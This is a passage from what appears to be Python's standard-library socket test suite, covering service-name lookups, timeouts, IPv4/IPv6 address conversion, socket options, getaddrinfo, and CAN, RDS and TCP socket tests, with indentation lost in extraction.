# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup choses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_uknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
